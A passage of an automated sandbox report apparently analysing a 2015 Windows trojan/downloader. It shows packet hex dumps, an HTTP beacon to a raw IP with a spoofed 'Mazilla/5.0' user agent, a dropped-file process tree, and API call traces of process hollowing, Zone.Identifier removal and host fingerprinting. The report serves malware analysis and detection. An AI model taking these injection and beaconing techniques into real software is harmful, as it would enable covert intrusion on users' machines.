Feb 19, 2015 13:02:00.968218088 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e d7 0a d7 a1 ac 71 e3 f8 fd a4 fc dd 10 3e c6 7a de 18 4b b5 d5 25 22 88 b8 b2 df ae c8 72 c9 a1 83 a4 db f8 8f 55 bd ed c3 3e 45 a3 a4 40 1c a2 92 ad 29 09 d8 8e 30 75 60 fa 60 e1 84 27 94 d7 ed 7c 49 66 ac a9 e2 85 4f 68 14 2e da 36 71 a0 29
Data Ascii: q>zK%"rU>E@)0u``'|IfOh.6q)9@+K\CP>r^95}|(|rCPB@q;f>X4EBL:s:z2>1R>tINk6;|UuGaP1QmG`mE)z>.~[lo
308
Feb 19, 2015 13:02:00.968346119 MEZ801032216.194.168.39192.168.1.10Data Raw: 61 c4 14 95 e6 ad 27 8f ba 50 71 8b 1e 24 7f 8d a0 70 8f b7 a2 15 3e ee e2 a6 bd 28 61 70 7f 7c b8 ac 24 27 a3 2e 50 af f9 25 3e cb 57 43 d3 78 8c 1a 57 96 c8 89 ef 07 54 3b 2a 49 e2 ee 81 9f b4 b0 7c fa 95 6c 70 0f 2b 0e ee 60 1d 19 55 04 e2 34
Data Ascii: a'Pq$p>(ap|$'.P%>WCxWT;*I|lp+`U49IP2>giV<I9?,aE;|0>D;iR>z%{1o_~*$R23:#PWn/>X?7G?%l;>\
309
Feb 19, 2015 13:02:00.968413115 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d ac 57 52 72 02 26 a8 c3 8d 3e 64 b8 38 27 2d dc 49 d6 35 63 f6 58 f6 a2 cd 3f 96 e3 c1 0c 7d f1 79 0d 53 70 ac 8f e4 3f 50 4b 58 52 f7 3e 65 bc c4 36 e7 a2 c8 bf 1e 27 b5 2e 04 a0 b7 6a 7d 5f ac 22 29 11 41 f9 40 8a 5e 3e a6 68 ba e2 83 e5 a6
Data Ascii: -WRr&>d8'-I5cX?}ySp?PKXR>e6'.j}_")A@^>h%E4m_E_i}LKZ0R>o+6R>kNU6U]r}Dv4:Uqmwq\<;&,=C>%A{F>#;eWY6X1&J.a(sw
311
Feb 19, 2015 13:02:00.968417883 MEZ801032216.194.168.39192.168.1.10Data Raw: b7 29 3b 5f 13 ec 3e d8 e0 33 fc c0 73 ff 3d a2 3b a9 e7 a7 c7 5d f4 7d 27 5c 3e ec eb 6a 53 11 a4 79 cc a6 ab 5f 22 9b cd b2 c2 e8 e4 c7 07 a9 86 2d 0b eb b5 6c 44 f6 86 21 7d 35 fb a8 27 a9 e4 a0 d3 b9 9a 09 01 ed 55 ac 58 2e a5 23 f3 ec c7 27
Data Ascii: );_>3s=;]}'\>jSy_"-lD!}5'UX.#'>z_/IADL'K/K2c )3>EkhM")6QcS{][>PJ)I} d$t<WO{Sd>*yT
312
Feb 19, 2015 13:02:00.968524933 MEZ801032216.194.168.39192.168.1.10Data Raw: a6 99 41 0b 89 b1 c3 1b 9b 19 b8 a9 e0 bb 51 0b 6c 00 43 3e 52 4d 64 10 f6 91 2b 0d fa e4 7d 5d e6 97 7a 25 7b 8b c1 af e6 01 66 35 42 c6 e5 f7 f4 ac fb 3a 65 ee 6f 27 1b f9 3e cc b4 60 7c 78 6d 87 48 1b b0 04 32 5a 7e 7d 77 e6 e6 ea 53 a1 f3 3b
Data Ascii: AQlC>RMd+}]z%{f5B:eo'>`|xmH2Z~}wS;IOt-]>P:?$$f?\>]^+~3'x}!W>L)z}4TP0%^>c;kXBz0[z>}J3D"+WG^/
314
Feb 19, 2015 13:02:00.968528986 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e ce 91 ae c0 c7 3e c1 86 06 44 12 1b 54 79 7b a4 a4 f0 39 c8 fa dc ba e3 b0 d3 e5 ee 68 64 56 55 a0 3e 6d eb 3f 30 be 01 8a ee 82 6d ec 5a ba d8 5b ca 98 e7 81 6a 57 c0 ed bf ea 79 ac 0d f6 50 c5 40 ca ee 85 3e 36 a5 a6 b0 ec a5 09 20 8b a3 71
Data Ascii: >DTy{9hdVU>m?0mZ[jWyP@>6 q%hby[T`tA.H9"_b>Kchz]m3|UH#O:?&o}s>;aeSw0jS1elK;}ghGYNm0n^
315
Feb 19, 2015 13:02:00.968532085 MEZ801032216.194.168.39192.168.1.10Data Raw: a8 1e 7f 78 d8 b4 7d a3 e8 2b bc d2 85 8e de f5 f9 ac c1 87 ad 79 ad f8 6b e3 3e 25 88 66 4c 5e 53 ef ae ee b7 a9 67 eb 7b e1 bf 0e 88 7c 3e ec bc 1e 9a e6 93 21 37 f2 44 cc 65 8f 2f 96 e7 07 e8 e1 3c 20 f4 ef 7c eb 38 ac 2a 68 fd f1 6f 0f 9d e3
Data Ascii: x}+yk>%fL^Sg{|>!7De/< |8*hoF3:b2sS'P>prTmqBB;;Ac3>I`C:QNH>tzy#~z~/2k@ArX\>Ygj+:/kW?vXs?S4W>hG e
317
Feb 19, 2015 13:02:00.968641043 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 83 79 46 a7 d3 5b 53 a3 50 91 ac 52 f7 7b 3d ea f5 da 06 2b 86 3a 36 7b ac 57 13 70 d5 d2 e6 9c de 3e 12 2a 7c d0 c9 b2 e4 ff 5c 4f 50 a1 2b d4 68 a2 d5 ea 52 c1 64 c2 9a 01 d2 ca ac 52 8d f5 a5 3f 36 62 4b 2e bf 53 d8 c9 bf e1 ac f2 2d ea a6
Data Ascii: VyF[SPR{=+:6{Wp>*|\OP+hRdR?6bK.S-}_5]u>Z~l9?jeR40}PeZ<69|Z5gLW^>~_z
317
Feb 19, 2015 13:02:00.968648911 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 7c cc 8c db 05 0f 27 03 69 ea 1a 58 16 40 e4 bf d7 c1 ac b9 c3 81 49 9e 1f e7 ec 3e 07 77 fa ae 05 d9 fa 41 85 43 21 ae 1d be 21 4d c2 fa c2 01 c8 dd 57 32 9e 8d b0 3e eb 5a ec 39 e2 0b 61 6f 8c 8e 00 bd 80 a2 c7 57 cf ea e4 fa fe 55 01 a0 a5
Data Ascii: V|'iX@I>wAC!!MW2>Z9aoWUQ^*!UAddvXQ><|<-xR/|B>R<G8>fgn\1X;#kMR-{D^#gs;>S
318
Feb 19, 2015 13:02:00.968655109 MEZ801032216.194.168.39192.168.1.10Data Raw: 6a d1 5f c4 47 ca 83 81 fe 25 f2 e9 41 1d fe e3 3a 77 ff ac 82 0f 0e b3 53 4c 2a ef 3e d2 7e aa 6d 55 3e 1e 16 f2 60 c3 bb 24 33 51 c1 b4 eb e7 12 4b 19 a2 b6 68 66 ac 20 be 7c 2b ce 26 e3 c6 3e 9c 6d 10 7f ef 88 e3 e2 fb ff be a6 7e a3 0a 9b c2
Data Ascii: j_G%A:wSL*>~mU>`$3QKhf |+&>m~=%;O.mF}>wwJ:m->~MP@76)l8?wdDCv2S>8RK+JDq1nA<Y|jF*9?_~;!fUce)
320
Feb 19, 2015 13:02:00.968771935 MEZ801032216.194.168.39192.168.1.10Data Raw: 65 4b 1f 8b 48 47 95 d6 c1 95 f6 a0 95 9d 3b ac 92 6e ac 52 2a 7e ae a5 3e e0 09 72 4c 00 ce 8a 44 5e 5a 11 54 c8 91 48 27 0e 6d 1a b0 2a ac a6 72 fd 91 e3 3e f5 80 f1 00 32 7a fa 09 65 95 c6 58 1d 25 b4 da 8d ed 86 91 48 0a 43 df 2a 22 ac 9b 6e
Data Ascii: eKHG;nR*~>rLD^ZTH'm*r>2zeX%HC*"n<fT>|`nmZ3nX4~miwdp/>kJl|]j~GNr\%`X,:b4=h<;]D>}1f:vPNlRX}
322
Feb 19, 2015 13:02:00.968776941 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 81 13 0c 38 31 69 89 4b c5 f6 98 19 b9 a2 4d 72 3c ee 33 41 3b 2b cf 24 cc 8e ac 9b d6 60 c2 9d ca 0f cc 3e ee 8b 23 ca 96 c1 ef 2b ce 62 da 93 05 3f 64 b6 81 8e ff e2 d0 e5 f6 61 5d a4 aa 59 d3 60 9a b2 45 31 8e 62 d0 ee c6 f2 5f 54 52 38 46
Data Ascii: >81iKMr<3A;+$`>#+b?da]Y`E1b_TR8Fy@3ja>AaP<{o8'2j.g;/e:0'-o:kzJ/>/6`=PnJniA680!?&dW-1Teuok>ovWU<|(3zj b2v<^b
Feb 19, 2015 13:02:09.318830013 MEZ | 1033 | 14033 | 192.168.1.10 | 31.43.236.251 | GET /1902uk11/377142/41/7/4/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 31.43.236.251:14033
Cache-Control: no-cache

Hooks - Code Manipulation Behavior

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


System Behavior

General

Start time:13:01:42
Start date:19/02/2015
Path:C:\in.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:42
Start date:19/02/2015
Path:C:\in.exe
Wow64 process (32bit):false
Commandline:C:\in.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:43
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:45
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:02:04
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Imagebase:0x400000
File size:517632 bytes
MD5 hash:7C9DB45DD4BDCD25DC21D7D91D552E32

General

Start time:13:02:22
Start date:19/02/2015
Path:C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Imagebase:0x400000
File size:517632 bytes
MD5 hash:7C9DB45DD4BDCD25DC21D7D91D552E32

General

Start time:13:02:38
Start date:19/02/2015
Path:C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost -k DcomLaunch
Imagebase:0x1000000
File size:14336 bytes
MD5 hash:27C6D03BCDB8CFEB96B716F3D8BE3E18

Disassembly

Code Analysis


    Executed Functions

    APIs
    • CreateProcessW.KERNEL32(C:\in.exe,00000000,00000000,00000000,00000004,00000000,00000000,00404158,0040419C), ref: 00402AFF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • NtWriteVirtualMemory.NTDLL(0000004C,7FFD6008,?,00000004), ref: 00402C77
    • NtWriteVirtualMemory.NTDLL(0000004C,00400000,003E0000,?), ref: 00402CAA
    • NtWriteVirtualMemory.NTDLL(0000004C,EntryPoint,?,?), ref: 00402D7E
    • NtSetContextThread.NTDLL(00000050,003E0068,?,00000004), ref: 00402DC2
    • FlushInstructionCache.KERNEL32(0000004C,00400000,?), ref: 00402DE8
    • ExitProcess.KERNEL32(00000000,?,00000004,7FFD5FF8), ref: 00402DFC
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00402002
    • LoadLibraryA.KERNEL32(00000000,641C549D,21D515AE,F40F4E9E), ref: 0040233C
    • CreateThread.KERNEL32(00000000,00000000,004024B8,00404484), ref: 0040236C
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • NtWriteVirtualMemory.NTDLL(0000004C,7FFD6008,?,00000004), ref: 00402C77
    • NtWriteVirtualMemory.NTDLL(0000004C,00400000,003E0000,?), ref: 00402CAA
    • NtWriteVirtualMemory.NTDLL(0000004C,EntryPoint,?,?), ref: 00402D7E
    • NtSetContextThread.NTDLL(00000050,003E0068,?,00000004), ref: 00402DC2
    • FlushInstructionCache.KERNEL32(0000004C,00400000,?), ref: 00402DE8
    • ExitProcess.KERNEL32(00000000,?,00000004,7FFD5FF8), ref: 00402DFC
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd

    Non-executed Functions

    APIs
    • LoadIconA.USER32(?,00000011), ref: 004020E5
    • GetClientRect.USER32(?,004040F5), ref: 004020F8
    • MoveWindow.USER32(00000001,?,00000011), ref: 0040211E
    • SetFocus.USER32 ref: 00402131
    • GetClientRect.USER32(?,004040F5), ref: 00402146
    • CreateWindowExA.USER32(00000200,EDIT,00000000,503000C4,?,00000000,00000000), ref: 00402182
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000001,00000000), ref: 004021B1
    • SendMessageA.USER32(00000030,00000000,00000000), ref: 004021CF
    • SendMessageA.USER32(0000000C,00000000,00000000), ref: 00402200
    • MessageBoxA.USER32(?,yexwvbncrvlnsbqugfntuhegllb,kiwciukfwgna,00000000), ref: 00402217
    • DefWindowProcA.USER32(?,00000111,?,?), ref: 0040222B
    • DeleteObject.GDI32 ref: 00402239
    • PostQuitMessage.USER32(00000000), ref: 00402241
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • RegisterClassA.USER32(004040A9), ref: 00402021
    • CreateWindowExA.USER32(00000000,bswdrvojguno vqjgmrmu,bvuxuccl jpuybdcvoaolstwdhp,00CF0000,00000090,00000080,00000100,00000100,00000000,00000000,00000000), ref: 0040205C
    • GetMessageA.USER32(004040D9,00000000,00000000,00000000), ref: 00402071
    • TranslateMessage.USER32(004040D9), ref: 00402083
    • DispatchMessageA.USER32(004040D9), ref: 0040208E
    • ExitProcess.KERNEL32 ref: 0040209C
    • LoadIconA.USER32(?,00000011), ref: 004020E5
    • GetClientRect.USER32(?,004040F5), ref: 004020F8
    • MoveWindow.USER32(00000001,?,00000011), ref: 0040211E
    • SetFocus.USER32 ref: 00402131
    • GetClientRect.USER32(?,004040F5), ref: 00402146
    • CreateWindowExA.USER32(00000200,EDIT,00000000,503000C4,?,00000000,00000000), ref: 00402182
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000001,00000000), ref: 004021B1
    • SendMessageA.USER32(00000030,00000000,00000000), ref: 004021CF
    • SendMessageA.USER32(0000000C,00000000,00000000), ref: 00402200
    • MessageBoxA.USER32(?,yexwvbncrvlnsbqugfntuhegllb,kiwciukfwgna,00000000), ref: 00402217
    • DefWindowProcA.USER32(?,00000111,?,?), ref: 0040222B
    • DeleteObject.GDI32 ref: 00402239
    • PostQuitMessage.USER32(00000000), ref: 00402241
    Strings
    • bswdrvojguno vqjgmrmu, xrefs: 00402055
    • bvuxuccl jpuybdcvoaolstwdhp, xrefs: 00402050
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNEL32(00000005,00A73C80,00001000,00000004), ref: 00401276
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401304
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000001), ref: 00401382
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040139C
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 004013A5
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013EA
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00401413
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00401430
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,00000000), ref: 0040144D
    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 00401456
    • CloseHandle.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00401463
    • CreateProcessW.KERNEL32(00000043,?,00000000,00000043,00000000,00000043,00000043,?,00000000,?,?,?,00000000,?,?,?), ref: 004014A0
    • ExitProcess.KERNEL32(00000000,?,?,?,00000000), ref: 00401819
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.172514786.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_in.jbxd

    Non-executed Functions

    Executed Functions

    Non-executed Functions

    Executed Functions

    APIs
    • FindResourceA.KERNEL32(00000000,018F2041,0000000A), ref: 018F1E4D
    • SizeofResource.KERNEL32(00000000,00000000), ref: 018F1E96
    • LoadResource.KERNEL32(00000000,00000000), ref: 018F1EA1
    • LockResource.KERNEL32(00000000), ref: 018F1EAB
    • GetEnvironmentVariableA.KERNEL32(temp,?,00000104), ref: 018F1EC2
    • lstrlenA.KERNEL32(?,?,?,?,00000000), ref: 018F1ECF
    • lstrcatA.KERNEL32(?,018F56DC,?,?,?,00000000), ref: 018F1EFB
    • lstrcatA.KERNEL32(?,?,?,?,?,00000000), ref: 018F1F1B
    • lstrcatA.KERNEL32(?,.exe,?,?,?,00000000), ref: 018F1F29
    • DeleteFileA.KERNEL32(?), ref: 018F1F38
      • Part of subcall function 018F1CFA: CreateFileA.KERNEL32(018F2041,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F1D12
      • Part of subcall function 018F1CFA: GetProcessHeap.KERNEL32 ref: 018F1D2A
      • Part of subcall function 018F1CFA: HeapAlloc.KERNEL32(00000000,?,?,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D2D
      • Part of subcall function 018F1CFA: SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 018F1D59
      • Part of subcall function 018F1CFA: WriteFile.KERNEL32(?,00000000,?,018F1F50,00000000), ref: 018F1D6A
      • Part of subcall function 018F1CFA: GetProcessHeap.KERNEL32 ref: 018F1D75
      • Part of subcall function 018F1CFA: HeapFree.KERNEL32(00000000,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D78
      • Part of subcall function 018F1CFA: CloseHandle.KERNEL32(?), ref: 018F1D81
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 018F1F61
    • lstrcatA.KERNEL32(?,:Zone.Identifier,?,?,?,?,?,?,?,00000000), ref: 018F1F6F
    • DeleteFileA.KERNEL32(?), ref: 018F1F78
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F1FB9
    • CloseHandle.KERNEL32(00000000), ref: 018F1FC0
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 018F1FDD
    • Sleep.KERNEL32(00000FA0), ref: 018F1FE8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 018F13FE
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F141E
    • GetProcAddress.KERNEL32(00000000), ref: 018F1425
    • GetSystemInfo.KERNEL32(?), ref: 018F1437
    • GetVersionExA.KERNEL32(0000009C), ref: 018F1444
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 018F400B
    • HeapAlloc.KERNEL32(00000000,00000000,00000004,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F402C
    • GetComputerNameA.KERNEL32(00000000,00002907), ref: 018F4047
    • GetVersionExA.KERNEL32(0000009C), ref: 018F4069
    • wsprintfA.USER32(00000004,00000075,?,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F4107
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 018F1726
      • Part of subcall function 018F1365: GetCurrentProcess.KERNEL32 ref: 018F136F
      • Part of subcall function 018F1365: OpenProcessToken.ADVAPI32(00000000), ref: 018F1376
    • GetTokenInformation.ADVAPI32(00000000,00000002,?,00000800,?), ref: 018F174F
    • EqualSid.ADVAPI32(?,?), ref: 018F176D
    • CloseHandle.KERNEL32(00000000), ref: 018F178E
    • FreeSid.ADVAPI32(?), ref: 018F1797
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • InternetOpenA.WININET(Mazilla/5.0,00000000,00000000,00000000,00000000), ref: 018F3F39
    • InternetCloseHandle.WININET(00CC0018), ref: 018F3F56
    • GetTickCount.KERNEL32 ref: 018F3F62
    • InternetConnectA.WININET(?,00000000,00000000,00000003,00000000,00000000), ref: 018F3F97
      • Part of subcall function 018F4000: GetProcessHeap.KERNEL32 ref: 018F400B
      • Part of subcall function 018F4000: HeapAlloc.KERNEL32(00000000,00000000,00000004,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F402C
      • Part of subcall function 018F4000: GetComputerNameA.KERNEL32(00000000,00002907), ref: 018F4047
      • Part of subcall function 018F4000: GetVersionExA.KERNEL32(0000009C), ref: 018F4069
      • Part of subcall function 018F4000: wsprintfA.USER32(00000004,00000075,?,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F4107
    • HttpOpenRequestA.WININET(GET,?,00000000,00000000,00000000,80000000,00000000,?), ref: 018F3FD9
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 018F3FE8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(018F2041,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F1D12
    • GetProcessHeap.KERNEL32 ref: 018F1D2A
    • HeapAlloc.KERNEL32(00000000,?,?,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D2D
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 018F1D59
    • WriteFile.KERNEL32(?,00000000,?,018F1F50,00000000), ref: 018F1D6A
    • GetProcessHeap.KERNEL32 ref: 018F1D75
    • HeapFree.KERNEL32(00000000,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D78
    • CloseHandle.KERNEL32(?), ref: 018F1D81
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00A200A8
    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 00A200BD
    • VirtualAlloc.KERNEL32(?,00001000,00001000,00000004), ref: 00A200D5
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 00A2012C
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 00A20273
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 00A202C3
    Memory Dump Source
    • Source File: 00000003.00000002.280031358.00A20000.00000040.sdmp, Offset: 00A20000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_a20000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F3E4F
    • GetModuleFileNameA.KERNEL32(00000000), ref: 018F3E56
      • Part of subcall function 018F16F7: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 018F1726
      • Part of subcall function 018F16F7: GetTokenInformation.ADVAPI32(00000000,00000002,?,00000800,?), ref: 018F174F
      • Part of subcall function 018F16F7: EqualSid.ADVAPI32(?,?), ref: 018F176D
      • Part of subcall function 018F16F7: CloseHandle.KERNEL32(00000000), ref: 018F178E
      • Part of subcall function 018F16F7: FreeSid.ADVAPI32(?), ref: 018F1797
    • ExitProcess.KERNEL32(00000000), ref: 018F3E94
      • Part of subcall function 018F13C8: GetTickCount.KERNEL32 ref: 018F13FE
      • Part of subcall function 018F13C8: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F141E
      • Part of subcall function 018F13C8: GetProcAddress.KERNEL32(00000000), ref: 018F1425
      • Part of subcall function 018F13C8: GetSystemInfo.KERNEL32(?), ref: 018F1437
      • Part of subcall function 018F13C8: GetVersionExA.KERNEL32(0000009C), ref: 018F1444
      • Part of subcall function 018F15CB: GetCurrentProcess.KERNEL32 ref: 018F15D3
